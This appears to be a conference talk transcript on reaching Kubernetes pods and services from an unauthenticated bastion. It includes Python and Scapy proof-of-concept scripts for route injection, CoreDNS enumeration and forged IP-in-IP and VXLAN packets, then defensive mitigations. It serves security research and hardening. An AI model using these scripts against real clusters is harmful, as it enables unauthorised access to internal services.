Thanks very much. We'll look at the attacks in two separate parts, and then we'll run through how we can defend against the attacks that we mention.

So why do we care about any of this? Typically in a Kubernetes assessment, a security assessment, in my experience we'll start from the perspective of a compromised workload, a compromised pod. Maybe we assume that a developer laptop's been compromised. But there is still some attack surface that is not accounted for, so let's have a look at what we can get from an unauthenticated perspective on the network, using some more classical techniques.

We're going to start by having a look at open ports on our nodes. If we use one of our favourite port scanning tools against a typical worker node, we might expect something like this to show up. As we're using Linux Kubernetes nodes, it's fairly typical to expect SSH to be open, but ports 10256 and 10250 are Kubernetes components. We can verify this just by jumping onto one of the machines and confirming that kube-proxy owns 10256. This exposes a health check API, which doesn't really have too much attack surface, so we'll move on. Port 10250 is a little bit more interesting, as this is the kubelet API. In modern versions of Kubernetes this is authenticated, however, and so from a perspective on the network where we don't have any credentials, there's not much to see here. On that topic, though, if we did find any credentials, there's an excellent tool from CyberArk called kubeletctl that actually documents this API. It's a little bit outside the scope of the talk today.

If we move on to what a control plane node might look like in a self-managed cluster, we can see some familiar ports from the worker node: we've still got those kubelet and kube-proxy ports, plus SSH for administration. We also have TCP ports 2379 and 2380, which are used by etcd which, in a stacked configuration, is running on our control plane nodes. By default this uses mutual TLS, and so, again, there's not much we can gain here. The most interesting port here is 6443. This is the default port for the Kubernetes API server, and here we can start learning some information. As the nmap scan indicates, it's detected that there might be an SSL or TLS service listening on that port. So if we attempt to connect to it with OpenSSL, we can actually dump the TLS certificate presented on that port. Although there's a lot of information in there, the most interesting thing to us at this stage is the subject alternative name field. This can contain two types of information: the first is a DNS name, and the second is an IP address.
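To make that concrete, here's a minimal sketch of dumping that certificate and reading the subject alternative names from Python. The node address 10.123.0.20 and port 6443 are hypothetical, and it uses the third-party cryptography library:

    import ssl
    from cryptography import x509

    # Hypothetical API server address; any reachable endpoint on 6443 will do.
    API_SERVER = ("10.123.0.20", 6443)

    # Fetch the PEM certificate without validating it (we have no CA to trust yet).
    pem = ssl.get_server_certificate(API_SERVER)
    cert = x509.load_pem_x509_certificate(pem.encode())

    # The subject alternative name extension holds both DNS names and IP addresses.
    san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName).value
    print("DNS names:   ", san.get_values_for_type(x509.DNSName))
    print("IP addresses:", [str(ip) for ip in san.get_values_for_type(x509.IPAddress)])

The IP entries are typically where the cluster-internal service address shows up, which is what the next step relies on.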
So by default, Kubernetes will include in the certificate each IP address on which the API server listens. In this instance, we can see that it contains the IP address of the Kubernetes API server service, which is an information leak that could help us determine the Kubernetes service network range. This will be important later.

The API server also has one or two unauthenticated endpoints, probably the most common of which is the /version endpoint. There's not a huge amount of information here, but it does at least tell us the exact version of the cluster we're running, which might be useful if we want to check for already-known vulnerabilities or CVEs. Just to make this a bit easier, I've written a little nmap script that will tell us both the subject alternative names and that version information. It also makes things a little easier if we're enumerating across several hosts.

One area that is sometimes overlooked with network scanning is UDP scanning. It can be a bit slow, and the nature of the thing is just a bit awkward. But in this scenario we have a good idea of what we're expecting to be running on the other side, so we have a higher chance of success, and we can look for ports which run common networking and storage protocols. For example, in the scan on screen we can see port 4789, which is commonly used for VXLAN overlay networking. We'll talk a little bit more about that later.

So in this first section, all of these issues have been informational; we wouldn't really raise them as any kind of exploit. But in this next section, we'll have a look at some of the primitives of the Linux nodes that we're running and see if we can achieve something that we might call an exploit.

For those of you that have set up a cluster with a tool like kubeadm, you'll be aware that before you're able to run the tool, the node you're running on has to meet certain requirements, and this is based on the features of the Linux kernel on the node. One example of this is the IPv4 forwarding feature. What this means, if we turn it on, is that the Linux machine will route IP packets based on the rules it's configured with, so its iptables or nftables rules. In the words of Rory McCune, "Kubernetes is a router", and this has some implications that we may not expect.

Consider for a moment that we have an architecture something like the above, where we've tried to harden our cluster by not exposing our API server to the public internet, so we've implemented a jump host, and the way we've implemented it is that we've got one subnet containing our bastion, and it's the same subnet as all of our Kubernetes nodes. Using the previously described routing functionality, we can actually add routes on this bastion that will allow us to talk to pods and services within the cluster. So let me show you what I mean. How are we doing? Everyone at the back see that? Grand, thank you.

To start with, we'll use that script I showed to enumerate some basic information about the cluster, and we can see that here we're able to reveal the first IP in the service network. What we'll do now is make a small assumption that this network is a /24 network.
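As a side note, the unauthenticated version check mentioned above only takes a few lines. This is a sketch assuming the same hypothetical node address; it simply skips certificate verification:

    import json
    import ssl
    import urllib.request

    # Hypothetical API server endpoint discovered during the port scan.
    URL = "https://10.123.0.20:6443/version"

    # Skip certificate verification; we only want the unauthenticated version data.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    with urllib.request.urlopen(URL, context=ctx) as resp:
        version = json.load(resp)

    # Fields such as gitVersion identify the exact Kubernetes release.
    print(version.get("gitVersion"), version.get("platform"))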
We can widen that assumed /24 later if we need to, but for the time being it allows us to add a route via one of the nodes we previously discovered, like so. What we'll do now is look for the commonly deployed Kubernetes DNS component, CoreDNS. We know this is going to listen on TCP 53, so we can scan the service range across all IP addresses looking for that port. Great, it looks like we found it: we can see that CoreDNS is running on the service IP 10.100.0.10. This is really powerful, because CoreDNS contains a lot of information about the state of the cluster.

In this next step we'll use the wildcard functionality of CoreDNS to list all the other services within the cluster. Although that's slightly wrapped, hopefully you should be able to see that we have the CoreDNS service, the default Kubernetes service, and this other dashboard in the default namespace. So we should be able to just connect to that dashboard to see what it presents. Let's try it. And as we can see, we can connect directly to that service IP from our bastion without any authentication.

We're going to take this a step further and query CoreDNS for all the service endpoints, that is, the pod IPs behind the services in the cluster. What this allows us to see is some of the pod IPs in use by the cluster: down here we have addresses in the 10.0.x.x range. This allows us to make a further educated guess as to what network range the pod network is using, and we're going to guess that it's using the 10.0.0.0/16 range. Again, we can add a route to this via one of our nodes. Following this, we can scan directly across the range, and this will allow us to detect all pods, even if they weren't necessarily assigned to a service. Here we're just scanning three ports, but you could conduct a full port scan if you wanted to. We can see that we found a pod IP address with port 8080 open, and again we can curl it to check we can reach it. For this example we're using the same dashboard, but this time via the pod IP address, and we can confirm that we can reach that service from our bastion without any authentication whatsoever.

So you might think this is a bit of dodgy functionality; why does it exist? But in truth, it's actually relied on as functionality by some of the existing CNIs: both Romana and kube-router make use of this, and with good reason, because there are performance and complexity benefits to using this kind of routing over, say, an overlay network. But I'll leave you to decide whether it's a valid feature or it is indeed a bug.

So far we've looked at layer two networks. But in the real world, it's likely that we'll have nodes deployed in different subnets, different regions, maybe different availability zones, and so we might need to bridge our traffic over a layer three network. This is where overlay networks come in. Many CNIs these days will deploy with some kind of overlay network, and under the hood these will use either VXLAN or IP-in-IP technology. So consider for a moment the following architecture. Similar to before, we have a bastion host that we're asking users to pivot through, but this time we have our Kubernetes nodes running in one or more other subnets that are not the same one as our bastion.
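Before moving on to overlay networks, here is a rough sketch of that routed-network discovery. It assumes the hypothetical node and service-range addresses used above, uses the dnspython library, and the wildcard listing only works where the CoreDNS version and configuration still allow wildcard queries:

    import socket
    import subprocess

    import dns.resolver  # dnspython

    NODE = "10.123.0.20"           # a worker node we discovered earlier (hypothetical)
    SERVICE_NET = "10.100.0.0/24"  # assumed service range, guessed from the certificate SAN

    # Route the assumed service range via the node; IPv4 forwarding on the node does the rest.
    subprocess.run(["ip", "route", "add", SERVICE_NET, "via", NODE], check=True)

    # Sweep the range for something answering on TCP 53 - that should be CoreDNS.
    coredns = None
    for host in range(1, 255):
        ip = f"10.100.0.{host}"
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.3)
            if s.connect_ex((ip, 53)) == 0:
                coredns = ip
                break
    print("CoreDNS candidate:", coredns)

    # Ask CoreDNS to list every service in the cluster via a wildcard SRV query.
    resolver = dns.resolver.Resolver(configure=False)
    resolver.nameservers = [coredns]
    for record in resolver.resolve("any.any.svc.cluster.local", "SRV"):
        print(record.target)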
To give an overview of the IP-in-IP protocol, we'll look at layers two through four of the networking stack. IP-in-IP encapsulation works by encapsulating a layer three IP packet within another layer three IP packet. In a standard pod-to-pod communication, the outer packet will contain the source node IP and the destination node IP, and the inner packet will use the source pod IP address and the destination pod IP address. However, if an attacker has access to a bastion, they may be able to forge malicious packets, so they may be able to change the content of any of these headers that we care about.

In order for an attacker to route to pods in our cluster, they would need to specify the right destination node IP in the outer IP packet and the right destination pod IP in the inner packet. However, they also have some control over the source IP addresses. The inner IP packet's source address is important, as the attacker can set it to influence the return route of the packet. Let me explain that a bit. Because the Kubernetes node does not understand that we are sending it IP-in-IP packets, we have a one-sided tunnel: it has no route or rules to encapsulate the return journey, and therefore we need to find a way of returning data to the bastion host. If we set the inner packet's source address to the attacker's bastion, then when this packet gets de-encapsulated, the response from whichever pod we're talking to will use this source address as its destination. In this manner we can achieve a form of asymmetric routing, which allows us to retrieve a response from the node. The outer IP packet's source address is also important, as we can use it to bypass host firewall rules in some scenarios.

I appreciate that's a bit to take in, so let me give a little bit of context here. This is a proof-of-concept script which demonstrates the concept using the Scapy packet manipulation library. We can see that in the outer packet we're using the 10.123.0.10 IP address as the source; this is just any other node in our cluster. We're using the 10.123.0.20 IP address as our destination node IP; this is the one where the pod we're targeting is running. For the inner packet, we're using the bastion IP address as the source, and the IP address of the pod we're targeting, which in this case is CoreDNS, as the destination. We then assemble the packet using Scapy, targeting the any.any.svc.cluster.local wildcard DNS address, hoping to achieve similar results to before. We can see that this executes and that we send and receive normal DNS packets. If we look a bit deeper, we can see that the sent packet is IP-in-IP encapsulated and our response is not, showing that we're able to achieve asymmetric routing and communicate with services inside the cluster from the bastion, from an unauthenticated perspective.

Not all overlay networks use IP-in-IP; we also have VXLAN networks. Again looking at the structure of layers two through four, we can see that this time it's much more complicated. In VXLAN, a layer two Ethernet frame plus a VXLAN header are encapsulated in a layer four UDP datagram. The header fields that we care about in the outer IP packet are again the source and destination, which in the normal flow are node IPs. In the inner IP packet, the source will be the source pod IP and the destination will be the destination pod IP. However, in VXLAN we have some additional headers.
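Before we get to those extra VXLAN headers, here is a rough reconstruction of the IP-in-IP proof of concept just described, using Scapy. The node, bastion and CoreDNS addresses are the hypothetical ones from the walkthrough above:

    from scapy.all import DNS, DNSQR, IP, UDP, send, sniff

    OTHER_NODE = "10.123.0.10"   # spoofed outer source: another node in the cluster
    TARGET_NODE = "10.123.0.20"  # outer destination: the node hosting the target
    BASTION = "10.123.1.5"       # inner source (hypothetical bastion IP) so replies route back to us
    COREDNS = "10.100.0.10"      # inner destination: the CoreDNS service IP

    # Outer node-to-node IP header (protocol 4 = IP-in-IP) wrapping an inner
    # bastion-to-service IP header, carrying an ordinary DNS query.
    packet = (
        IP(src=OTHER_NODE, dst=TARGET_NODE, proto=4)
        / IP(src=BASTION, dst=COREDNS)
        / UDP(sport=53000, dport=53)
        / DNS(rd=1, qd=DNSQR(qname="any.any.svc.cluster.local", qtype="SRV"))
    )

    # Start capturing first, then transmit; the reply comes back un-encapsulated
    # because the node has no tunnel rule for the return path.
    replies = sniff(
        filter="udp and src port 53",
        count=1,
        timeout=5,
        started_callback=lambda: send(packet),
    )
    if replies:
        replies[0].show()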
So in the VXLAN header we have the VNI. Whilst this is used meaningfully in other VXLAN implementations, in all the Kubernetes CNIs I've seen it's hardcoded to one. We also have this concept of the VTEP, the VXLAN tunnel endpoint. Unfortunately for us, this is a randomly generated hardware address, and so to attack VXLAN in a reasonable time frame we need to leak this from the cluster. It's annotated on the node resource object, so the permission we would need is get on nodes.

Thinking back to our network architecture, where we have that bastion in a separate subnet and our nodes in adjacent subnets, let's have a look at which headers an attacker would want to modify. In order to route to the right node and the right pod, the destination IP addresses in both of the IP packets need to be set correctly, as before. And as before, we can set the source IP address in the inner IP packet to achieve asymmetric routing. We can also set the source IP address in the outer IP packet to that of another node, to try and bypass any host firewall rules that prevent us from sending packets to that node. An attacker can fairly safely just hardcode the VNI to one, although if they know they're targeting a CNI that uses something different, they can modify it. And as previously mentioned, they would need to leak the VTEP address from the cluster via another method.

So let's have a look at how that looks in a proof-of-concept script. In the script, we set the outer source IP address to 10.123.0.10, which is the IP address of another node, and we set the outer destination IP address to 10.123.0.20, which is the target node. We set the VXLAN port to 4789, which is well known and which we enumerated during our nmap scan earlier, and we set the VNI to one. We include the VTEP address that we leaked from the cluster, and we set the source IP address of the inner packet to our bastion. Similarly to before, we're going to target the CoreDNS service and use its service address. We then construct the packet using Scapy and send it to our cluster. We can see that we're able to do so, and that we send a request in the right format and receive a response in the right format. If we look a little deeper, we can see our request is VXLAN encapsulated as expected, and our response is not; it's just a standard DNS response. This shows that if we have knowledge of the VTEP address of a node, we can communicate with pods and services inside our cluster from an adjacent subnet.

The eagle-eyed among you will have noticed that the proof-of-concept scripts are run as the root user. Although we used root for the proof of concept, we could use the bash /dev/tcp and /dev/udp pseudo-devices to achieve similar results, so we don't necessarily need the root user to achieve this attack.
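For reference, here is a rough Scapy reconstruction of that VXLAN proof of concept, under the same assumed addresses as before, with a placeholder for the VTEP MAC that would have to be leaked from the node object's annotations:

    from scapy.all import DNS, DNSQR, Ether, IP, UDP, VXLAN, send, sniff

    OTHER_NODE = "10.123.0.10"      # spoofed outer source: another node in the cluster
    TARGET_NODE = "10.123.0.20"     # outer destination: the node hosting CoreDNS
    BASTION = "10.123.1.5"          # inner source (hypothetical bastion IP) so replies route back to us
    COREDNS = "10.100.0.10"         # inner destination: the CoreDNS service IP
    VTEP_MAC = "aa:bb:cc:dd:ee:ff"  # placeholder for the target node's leaked VTEP address

    # Outer UDP/4789 datagram carrying a VXLAN header (VNI 1), an Ethernet frame
    # addressed to the target node's VTEP, and the inner bastion-to-service packet.
    packet = (
        IP(src=OTHER_NODE, dst=TARGET_NODE)
        / UDP(sport=54321, dport=4789)
        / VXLAN(vni=1)
        / Ether(dst=VTEP_MAC)
        / IP(src=BASTION, dst=COREDNS)
        / UDP(sport=53000, dport=53)
        / DNS(rd=1, qd=DNSQR(qname="any.any.svc.cluster.local", qtype="SRV"))
    )

    # As before, capture first and transmit once the sniffer is live; the answer
    # arrives as a plain, un-encapsulated DNS response.
    replies = sniff(
        filter="udp and src port 53",
        count=1,
        timeout=5,
        started_callback=lambda: send(packet),
    )
    if replies:
        replies[0].show()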
In order to mitigate some of the layer two attacks discussed in the first section, I would strongly recommend that you isolate any bastion hosts or untrusted workloads in different subnets to those of your nodes. If we do that, it also means we're able to write strict firewall rules to prevent any other kind of traffic traversing between these machines. For example, in the second half, in my lab environment there were no rules between these two subnets to prevent that traffic, which is one of the reasons we were able to do it.

In terms of Kubernetes-native things we can do, network policies also help us here. We can implement policies between workloads in our cluster, between individual pods, and this will prevent us being able to communicate with pods from outside the cluster, so we wouldn't have been able to curl that unauthenticated dashboard. Additionally, we can add network policies around kube-system if we want to prevent access to privileged components. For example, we can add a network policy to prevent access to CoreDNS from outside the cluster, which is probably a good idea in terms of general hardening.

I mentioned a couple of times that we could set the source IP address of the outer IP packet to avoid host firewall limitations. This is more commonly known as IP spoofing, and routers often have protection against this, but it's not always turned on. In my research, some CNIs needed this spoofing for the attack to work and some didn't, so you may want to investigate turning this protection on to prevent these kinds of attacks. The Linux kernel also has a feature to prevent some of the asymmetric routing I mentioned earlier, called reverse path filtering. Most distributions don't actually enable this by default, so it's either off or in a permissive mode. You could experiment with setting this to strict mode so that these kinds of attacks are not possible, although it's unclear whether this will affect any Kubernetes functionality, so you should test it well.

I've released the Nmap Kubernetes info script on GitHub, along with the other proof-of-concept scripts, which you're welcome to use and contribute to, and that's my Twitter handle if you want to follow me. Thanks for listening. I think we've got time for questions if anyone has any. Yes, down at the front, I think we've got a mic.

So the question was: could I use an internal IP address to bypass network policy? Good question. I don't think so, because in order to bypass network policy you would need to be able to set the IP address of the inner packet. I guess it would be almost like a CSRF situation: you'd probably also not be able to make a connection, so you'd need something that accepted UDP packets that you could send a request to. It would be quite convoluted; I'm not sure. If that's it, thanks very much.